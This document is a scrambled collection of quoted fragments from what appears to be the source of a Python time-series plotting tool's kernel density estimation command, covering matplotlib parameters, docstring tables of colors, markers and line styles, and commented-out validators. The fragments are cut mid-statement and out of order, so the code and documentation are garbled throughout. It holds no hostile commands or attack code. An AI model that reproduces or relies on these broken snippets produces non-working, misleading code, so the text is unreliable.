lines. If a single color then", "dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por, ) tsd, lnames = plotutils.check(type,", "= tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin", "[optional, default is 'auto'] The default 'auto' will cycle through", "plt.tight_layout() if ofilename is not None: plt.savefig(ofilename) return plt kde.__doc__", "[]], 1], # por=[bool, [\"domain\", [True, False]], 1], # invert_xaxis=[bool,", "'' | nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional,", "linestyles list. \"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date,", "defaults to False] Make separate subplots for each time series.", "plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle = ytitle or", "hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, )", "= tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize) if type in", "'colors', 'linestyles', and 'markerstyles' instead of using the 'style' keyword.", "'steps' is equivalent to 'steps-pre' and is maintained for backward-compatibility.", "nxlim[0] if hlines_xmax is None: hlines_xmax = nxlim[1] if vlines_x", "\") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:])", "[optional, default to True] In case subplots=True, share x axis.", "= itertools.cycle(colors) else: icolors = None imarkerstyles = itertools.cycle(markerstyles) ilinestyles", "[optional, default is True] When using a secondary_y axis, should", "norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead.", "Kernel Density Estimation or 'hist' for a histogram. bootstrap_size :", "Python a list of color code strings. Can identify colors", "None, \"\", \" \", \" \"] + plotutils.LINE_LIST], None], #", "9 that gets the Nth color from the current style.", "command line supply a comma separated matplotlib color codes, or", "of chart. figsize : str [optional, defaults to '10,6.5'] The", "\"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], # ], # 1,", "in the current plot style. vlines_linestyles: [optional, defaults to None]", "hexagon1 | +-------+----------------+ | H | hexagon2 | +-------+----------------+ |", "\"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as plt from matplotlib.ticker", "legend_names) # This is to help pretty print the frequency", "itertools.cycle(colors) else: icolors = None imarkerstyles = itertools.cycle(markerstyles) ilinestyles =", "i in plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _,", "ValueError( tsutils.error_wrapper( \"\"\" You have to have the same number", "is None: hlines_xmax = nxlim[1] if vlines_x is not None:", "\" \", \" \"] + plotutils.LINE_LIST], # None, # ],", "the minimum x value for the entire plot. hlines_xmax: [optional,", "st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\" \")", "| +------+---------+ | m | magenta | +------+---------+ | y", "| 4 | tri_right | +-------+----------------+ | 8 | octagon", "single color then will be used as the color for", "[True, False]], 1], # mark_right=[bool, [\"domain\", [True, False]], 1], #", "# label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\", [1, None]],", "# lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str, [\"pass\", []],", "See `xlim` for examples. xaxis : str [optional, default is", "source_units=source_units, target_units=target_units, clean=clean, por=por, ) tsd, lnames = plotutils.check(type, tsd,", "all styles that are setup to be able to be", "Markers | +=======+================+ | . | point | +-------+----------------+ |", ": str [optional, default is 'default'] 'default' connects the points", "import os import warnings import mando import numpy as np", "the data called kernel density estimation (KDE). {ydata} Parameters ----------", "barh, bar_stacked, and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if ( logx", "--norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For", "to 1] The lag used if ``type`` \"lag_plot\" is chosen.", "None is replaced by 'colors', 'linestyles', and 'markerstyles' options. Currently", "limits for the y-axis of the plot. See `xlim` for", "pretty print the frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower()", "use '--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional,", "comma separated list of strings for each time-series in the", "import matplotlib.pyplot as plt from matplotlib.ticker import FixedLocator tsd =", "# \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\",", "time-series. Just combine codes in 'ColorMarkerLine' order, for example 'r*--'", "hlines_xmax is None: hlines_xmax = nxlim[1] if vlines_x is not", "be same length as `vlines_x`. If None will take from", "in [\"kde\", \"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey,", "\"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\", # \"scatter\", #", "# This is to help pretty print the frequency try:", "vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles", "represents the level of gray, where 0 is white an", "of the yaxis. One of 'arithmetic', 'log'. secondary_y [optional, default", "would limit the plot from 1 to 1000, where '--xlim", "Black, White, and Gray Styles The \"ieee\" style is appropriate", "horizontal lines. If a single color then will be used", "data called kernel density estimation (KDE). {ydata} Parameters ---------- {input_ts}", "probability density function based on the data called kernel density", "force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units,", "None: linestyles = [\" \"] else: linestyles = [\" \"", "'linestyles', and 'markerstyles' options. Currently the 'style' option will override", "clean=clean, por=por, ) tsd, lnames = plotutils.check(type, tsd, legend_names) #", "barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if ( logx is True or", "data and set the upper limit to 1000. ylim [optional,", "changed or added to as needed. lag_plot_lag [optional, default to", "If 'auto' will iterate through the available matplotlib line types.", "lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str [optional, defaults", "figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles,", "to ''] Title of chart. figsize : str [optional, defaults", "vertical | +-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+ |", "matplotlib color codes, or within Python a list of color", "i for i in plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize,", "np import pandas as pd from mando.rst_text_formatter import RSTHelpFormatter from", "of functions for the manipulation of time series.\"\"\" from __future__", "not display lines use a space (' ') as the", "\"IEEE\" journal. The \"grayscale\" is another style useful for photo-copyable", "based on the data called kernel density estimation (KDE). {ydata}", "between 0 and 1 that represents the level of gray,", "linestyles == \"auto\": linestyles = plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles)", "The lag used if ``type`` \"lag_plot\" is chosen. xtitle :", "[optional, default is 'default'] 'default' connects the points with lines.", "hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ):", "norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str", "linestyles.append(st[1:]) if linestyles is None: linestyles = [\" \"] else:", "defines the type, for example 'filename.png' will create a PNG", "True] In case subplots=True, share x axis. sharey [optional, default", "| +-------+----------------+ | s | square | +-------+----------------+ | p", ": str [optional, defaults to 'plot.png'] Output filename for the", "density function. \"kde\" will create a plot of estimation of", "plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None,", "p | pentagon | +-------+----------------+ | ``*`` | star |", "the current style. 2. Single character code from the table", "axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__),", "Legend would normally use the time-series names associated with the", "nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default is", "not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax =", "+-------+----------------+ | p | pentagon | +-------+----------------+ | ``*`` |", "[optional, defaults to None] List of minimum y values to", "hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin is None:", "grid lines on the major ticks. label_rotation : int [optional]", "1, # ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], #", "will be the maximum x value for all vertical lines.", "start the vertical line. If a list must be same", "Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If 'auto'", "up | +-------+----------------+ | < | triangle left | +-------+----------------+", "grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position,", "ax = plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]: ax =", "a column of the \"IEEE\" journal. The \"grayscale\" is another", "will take for the standard linestyles list. vlines_x: [optional, defaults", "[optional, defaults to None] Legend would normally use the time-series", "'steps-pre' and is maintained for backward-compatibility. ACCEPTS:: ['default' | 'steps'", "black, white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots", "List of colors for the vertical lines. If a single", "prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\",", "current plot style. vlines_linestyles: [optional, defaults to None] List of", "[\"pass\", []], 1], # subplots=[bool, [\"domain\", [True, False]], 1], #", "The steps variants produce step-plots. 'steps' is equivalent to 'steps-pre'", "list of color code strings. Can identify colors in four", "if colors is not None: icolors = itertools.cycle(colors) else: icolors", "**kwds, ): r\"\"\"Plot data.\"\"\" # Need to work around some", "[ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\",", "diagonal hatching | +-----------------+-------------------+ | ``\\`` | back diagonal |", "the command line supply a comma separated matplotlib color codes,", "True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout()", "str [optional, default is \"default\"] Set the style of the", "[True, False]], 1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1], #", "lines. The steps variants produce step-plots. 'steps' is equivalent to", "kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\",", "setup to be able to be distinguished by someone with", "> | triangle right | +-------+----------------+ | 1 | tri_down", "r | red | +------+---------+ | c | cyan |", "| ' ' | draw nothing | +---------+--------------+ | ''", "must be same length as `vlines_x`. If a single number", "\"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] ==", "markerstyles = [] linestyles = [] for st in nstyle:", "v | triangle down | +-------+----------------+ | ^ | triangle", "= [] for st in nstyle: colors.append(st[0]) if len(st) ==", "tsd, legend_names) # This is to help pretty print the", "+-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+ | / |", "styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to None]", "markerstyles = [\" \" if i is None else i", "d | thin diamond | +-------+----------------+ | _ | hlines_y", "'width,height' of plot in inches. legend [optional, defaults to True]", "gets the Nth color from the current style. 2. Single", "from the color pallette in the current plot style. hlines_linestyles:", "\"\"\" * * The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and", "a single color then will be used as the color", "as time-series to plot. You supplied '{}' for style which", "= tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles =", "\"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\". If multiple styles", "--logy use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" * For", "pltfreq = str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\": beginstr =", "8 | octagon | +-------+----------------+ | s | square |", "the vertical line. If a list must be same length", ": str [optional, default is 'weibull'] {plotting_position_table} Only used for", "None], # vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[ # str,", "logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, ) for index, line in", "[] linestyles = [] for st in nstyle: colors.append(st[0]) if", "y | yellow | +------+---------+ | k | black |", "'r*--' is a red dashed line with star marker. bar_hatchstyles", "of the probability density function based on the data called", "code from the table below. +------+---------+ | Code | Color", "`vlines_x`. If None will take for the standard linestyles list.", "instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim [optional, default is", "False]], 1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1], # invert_yaxis=[bool,", "time-series names associated with the input data. The 'legend_names' option", "def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None,", "bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None,", "value or None will start at the minimum x value", "x values where to place a vertical line. vlines_ymin: [optional,", "https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to None] Number", "will be the maximum x value for all horizontal lines.", "| k | black | +------+---------+ 3. Number between 0", "all horizontal lines. A missing value or None will start", "--lognorm_yaxis options are deprecated. * * For --logx use --xaxis=\"log\"", "+ \".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for", "secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line,", "else: l = None if c is not None: plt.setp(line,", "| y | yellow | +------+---------+ | k | black", "axis of the various time-series automatically. scatter_matrix_diagonal : str [optional,", "option will override the others. Comma separated matplotlib style strings", "Title of x-axis. ytitle : str [optional, default depends on", "1], # sharex=[bool, [\"domain\", [True, False]], 1], # sharey=[bool, [\"domain\",", "matplotlib.pyplot as plt from matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds(", "the color for all horizontal lines. If a list must", "[ # \"classic\", # \"Solarize_Light2\", # \"bmh\", # \"dark_background\", #", "tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize) if type in [\"kde\",", "Gray Styles The \"ieee\" style is appropriate for black, white,", "of x-axis. ytitle : str [optional, default depends on ``type``]", "len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have to", "default depends on ``type``] Title of x-axis. ytitle : str", "| +-------+----------------+ | p | pentagon | +-------+----------------+ | ``*``", "Title of y-axis. title : str [optional, defaults to '']", "+-----------------+-------------------+ | * | stars | +-----------------+-------------------+ logx DEPRECATED: use", "vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str,", "if hlines_xmin is None: hlines_xmin = nxlim[0] if hlines_xmax is", "a list/tuple, which time-series to plot on secondary y-axis. mark_right", "Parameters ---------- {input_ts} ofilename : str [optional, defaults to 'plot.png']", "+ plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None, \"\", \"", "# \"domain\", # [ # \"classic\", # \"Solarize_Light2\", # \"bmh\",", "colors = None else: colors = tsutils.make_list(colors) if linestyles ==", "= tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin is None: hlines_xmin", "be distinguished by someone with color blindness. Black, White, and", "be used as the linestyle for all vertical lines. If", "1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str, [\"pass\",", "length as `vlines_x`. If None will take from the color", "linestyles [optional, default to 'auto'] If 'auto' will iterate through", "norm_yaxis is True or lognorm_xaxis is True or lognorm_yaxis is", "plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if", "str(tsd.index.freq).lower() if pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3 else:", "in [ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\",", "| +-------+----------------+ | ^ | triangle up | +-------+----------------+ |", "\"retro\". If multiple styles then each over rides some or", "probability plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis,", "warnings import mando import numpy as np import pandas as", "sharex=[bool, [\"domain\", [True, False]], 1], # sharey=[bool, [\"domain\", [True, False]],", "ilinestyles = itertools.cycle(linestyles) # Only for bar, barh, bar_stacked, and", "will create a plot of estimation of the probability density", "is True or norm_yaxis is True or lognorm_xaxis is True", "scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0, None]],", "# \"fivethirtyeight\", # \"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\",", "line. If a list must be same length as `hlines_y`.", "xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis,", "red | +------------------+ | burlywood | +------------------+ | chartreuse |", "available matplotlib line types. Otherwise on the command line a", "\" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str, [\"domain\", [\"auto\", None,", "None will end at the maximum x value for the", "will start at the minimum x value for the entire", "is 'auto'] The default 'auto' will cycle through matplotlib colors", "plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\" if", "\"lag_plot\" is chosen. xtitle : str [optional, default depends on", "tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin is", "\"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\",", "from 0 to 9 that gets the Nth color from", "== y. Set to a line style code. grid [optional,", "+ plotutils.LINE_LIST], # None, # ], # vlines_x=[float, [\"pass\", []],", "defaults to '10,6.5'] The 'width,height' of plot in inches. legend", "None] List of maximum x values to end each vertical", "tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin is", "# vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []], None],", "tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles)", "ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle)", "Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default is None] Still available,", "equivalent to 'steps-pre' and is maintained for backward-compatibility. ACCEPTS:: ['default'", "from tstoolbox import tsutils from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\",", "the previous. Color Blind Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\",", "option defaults with the implementation of # mando legend =", "| +------+---------+ 3. Number between 0 and 1 that represents", "and \"muted\" are all styles that are setup to be", "of 'arithmetic', 'log'. secondary_y [optional, default is False] Whether to", "# \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\",", "down | +-------+----------------+ | ^ | triangle up | +-------+----------------+", "None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax)", "the color pallette in the current plot style. vlines_linestyles: [optional,", "major labels for bar plots. drawstyle : str [optional, default", "that represents the level of gray, where 0 is white", "tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles", "+ | crossed | +-----------------+-------------------+ | x | crossed diagonal", "+------------------+ | chartreuse | +------------------+ | ...etc. | +------------------+ Color", "the Matplotlib figure that can then be changed or added", "plot of estimation of the probability density function based on", "lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None,", "\"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles", "style. At the command line supply a comma separated matplotlib", "of 'kde' for Kernel Density Estimation or 'hist' for a", "styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\",", "display lines use a space (' ') as the linestyle", "horizontal lines. If a single linestyle then will be used", "maximum x value for the entire plot. vlines_colors: [optional, defaults", "[\"auto\", None, \"\", \" \", \" \"] + plotutils.LINE_LIST], #", "'style' option will override the others. Comma separated matplotlib style", "figure that can then be changed or added to as", "invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid)", "the Python API. Separated 'colors', 'linestyles', and 'markerstyles' instead of", "plots. label_skip : int [optional] Skip for major labels for", "2], # ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\",", "default to ' '] The default ' ' will not", "vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True:", "in linestyles] markerstyles = [\" \" if i is None", "draw nothing | +---------+--------------+ | ' ' | draw nothing", "a list must be same length as `vlines_x`. If None", "plot from 1 to 1000, where '--xlim ,1000' would base", "various time-series automatically. scatter_matrix_diagonal : str [optional, defaults to 'kde']", "as the linestyle for all horizontal lines. If a list", "None: m = next(imarkerstyles) else: m = None if ilinestyles", "http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' '] The default '", "= None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only", "hlines_y = tsutils.make_list(hlines_y) hlines_xmin = tsutils.make_list(hlines_xmin) hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors", "is True or logy is True or norm_xaxis is True", "is True: plt.legend(loc=\"best\") if hlines_y is not None: hlines_y =", "\"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\",", "= \"kde\" import matplotlib matplotlib.use(\"Agg\") import matplotlib.pyplot as plt from", "norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean}", "good value to last good value. Strips NANs from beginning", "x value for the entire plot. vlines_colors: [optional, defaults to", "all horizontal lines. A missing value or None will end", "if using the Python API. Separated 'colors', 'linestyles', and 'markerstyles'", "match line where x == y. Set to a line", "a vertical line. vlines_ymin: [optional, defaults to None] List of", "# \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"],", "is not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x", "if type in [\"kde\", \"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots,", "for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date}", "invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin,", "the same number of style strings as time-series to plot.", "use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\" )", "if bar_hatchstyles == \"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles =", "in enumerate(ax.lines): if icolors is not None: c = next(icolors)", "not None: if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y =", "'steps-pre' | 'steps-mid' | 'steps-post'] por [optional] Plot from first", "someone with color blindness. Black, White, and Gray Styles The", "[\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[ # str, # [", "else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None: linestyles =", "range of x values] Comma separated lower and upper limits", "| 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post'] por [optional]", "single number will be the maximum x value for all", "type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x,", "Invert the x-axis. invert_yaxis [optional, default is False] Invert the", "matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type,", "# prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[ # str,", "vlines_ymin = nylim[0] if vlines_ymax is None: vlines_ymax = nylim[1]", "DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line", "= plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\":", "Any of the HTML color names. +------------------+ | HTML Color", "hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\"", "color then will be used as the color for all", "axis. sharey [optional, default to False] In case subplots=True, share", "\"auto\": linestyles = plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles", "if vlines_x is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin =", "'arithmetic', 'log'. yaxis : str [optional, default is 'arithmetic'] Defines", "= tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles = plotutils.HATCH_LIST else:", "# \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\",", "style strings as time-series to plot. You supplied '{}' for", "is equivalent to 'steps-pre' and is maintained for backward-compatibility. ACCEPTS::", "use --type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis", "| 3 | tri_left | +-------+----------------+ | 4 | tri_right", "None] List of linestyles for the horizontal lines. If a", "tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin is None: vlines_ymin =", "+---------+--------------+ | None | draw nothing | +---------+--------------+ | '", "import warnings import mando import numpy as np import pandas", "* For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\" ) if xaxis", "| '' | draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html", "for 'bootstrap' plot. bootstrap_samples [optional, defaults to 500] The number", "be the maximum x value for all vertical lines. A", "sharex=sharex, sharey=sharey, style=None, logx=logx, logy=logy, xlim=xlim, ylim=ylim, secondary_y=secondary_y, figsize=figsize, )", "for bar plots. drawstyle : str [optional, default is 'default']", "1000. ylim [optional, default is based on range of y", "[\"range\", [1, None]], 1], # xtitle=[str, [\"pass\", []], 1], #", "else: icolors = None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles)", "x == y. Set to a line style code. grid", "to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto' will iterate", "secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\",", "for i in markerstyles] if colors is not None: icolors", "bar_stacked, and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles) if ( logx is", "linestyles = [] for st in nstyle: colors.append(st[0]) if len(st)", "instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"'", "subplots=True, share x axis. sharey [optional, default to False] In", "# xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\", []], 1],", "List of maximum x values to end each vertical line.", "ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, 